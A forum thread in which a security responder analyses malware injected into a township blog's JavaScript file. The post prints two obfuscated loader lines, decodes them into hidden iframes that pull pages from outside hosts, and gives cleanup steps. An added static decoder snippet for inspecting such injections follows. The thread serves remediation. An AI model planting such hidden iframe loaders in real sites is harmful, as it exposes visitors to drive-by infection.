Need help finding malware on blog
by Kathleen
8 months ago

www.durhamtownship.com

Second time in the last three months it’s been hacked. Thank you.

by WeWatch
8 months ago

In your file: www.durhamtownship.com/indextools.js you have some malscript (spaces added to protect the innocent):

do cu me nt.w ri te(un es ca pe(‘3C%69%66%72%61%6D%65%20%73%72%63%3D
27%68%74%74%70%3A%2F%2F%74%72%61%66%66%69%63%69%6E%63%2E%72%75%
2F%69%6E%64%65%78%2E%70%68%70%27%20%77%69%64%74%68%3D%27%31%27%
20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%
73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%
69%66%72%61%6D%65%3E’));

Which deobfuscates to (iframe tags removed to protect the innocent and http changed to hxxp):

src=‘hxxp://trafficinc.ru/index.php’ width=‘1’ height=‘1’ style=‘visibility: hidden;’>

This malscript is in the first line of the above referenced file.

In addition, in that same file, in the last line you have:

f un c ti on uavxgizkldzyckm(fuqgkpou){var dtzhtxkdkr="";for
(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=
(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}
document.write(dtzhtxkdkr);}uavxgizkldzyckm
(“3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqp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”.replace(/eiqpxekm/g, ""));

Which deobfuscates to (iframe tags removed):

src=“http://top100-counter.com/top100/index.php” frameborder=“0” border=“0” width=“0” height=“0” style=“position: absolute; visibility: hidden; display: none”>

Which Google lists as suspicious.

Remove those 2 lines from your indextools.js and request a review from Google, after changing your FTP password and scanning all PCs that upload via FTP to your website for viruses with something other than what you currently use, and you’ll more than likely stop getting hacked.

Let the group here know of your progress or questions.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
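The two decoding steps WeWatch walked through above (percent-encoding handed to unescape(), and hex byte pairs with a junk token stripped by .replace()) can be reproduced statically, without ever running the script, so a site owner can check what an injected line actually loads. The following is an added example and not code from the thread or from WeWatch; the sample strings are constructed and use the placeholder host example.invalid rather than the domains named above.

```javascript
// Added example: static decoder for the two string-hiding tricks in the post
// above. It only decodes and inspects text; nothing is evaluated.
// Sample inputs are constructed with placeholder hosts (example.invalid).

// Decode "%3C%69..." text the way unescape() does for two-digit escapes.
function decodePercent(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Strip the filler token, then turn each hex pair into a character (the same loop
// the malscript runs before document.write). Null if not a clean run of hex pairs.
function decodeHexPairs(s, filler) {
  const clean = filler ? s.split(filler).join("") : s;
  if (clean.length % 2 !== 0 || /[^0-9A-Fa-f]/.test(clean)) return null;
  let out = "";
  for (let i = 0; i < clean.length; i += 2) {
    out += String.fromCharCode(parseInt(clean.substr(i, 2), 16));
  }
  return out;
}

// Pull the src out of the first <iframe> and flag it if it is styled invisible
// or sized 0/1 pixel. Returns null when the decoded text has no iframe.
function inspectIframe(html) {
  const m = /<iframe\b([^>]*)>/i.exec(html);
  if (!m) return null;
  const attrs = m[1];
  const src = (/\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs) || [])[1] || null;
  const hidden =
    /visibility\s*:\s*hidden|display\s*:\s*none/i.test(attrs) ||
    /\b(?:width|height)\s*=\s*["']?[01](?=["'\s]|$)/i.test(attrs);
  return { src, hidden };
}

// Constructed sample 1: percent-encoded, as it would be passed to unescape().
const SAMPLE_PERCENT =
  "%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F" +   // <iframe src='http://
  "%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%2F%78%27%20" +       // example.invalid/x'
  "%77%69%64%74%68%3D%27%31%27%20%73%74%79%6C%65%3D%27" +             // width='1' style='
  "%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E" + // visibility: hidden;'>
  "%3C%2F%69%66%72%61%6D%65%3E";                                      // </iframe>

// Constructed sample 2: hex pairs with the filler token "qq" sprinkled in.
const SAMPLE_HEX =
  "3C69qq6672616D6520qq7372633D22687474703A2F2Fqq6578616D706C652E" +
  "696E76616C69642F7922207769647468qq3D22302220qq7374796C653D2264" +
  "6973706C61793A206E6F6E65223E3C2F6966qq72616D653E";
```

Run inspectIframe(decodePercent(SAMPLE_PERCENT)) or inspectIframe(decodeHexPairs(SAMPLE_HEX, "qq")) to get the iframe's src and a hidden flag; a hidden iframe pointing at a host you do not own is the indicator to act on.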

by Kaleh
8 months ago

The last time Google visited this site was on 2009-07-06, and the site is still listed as suspicious.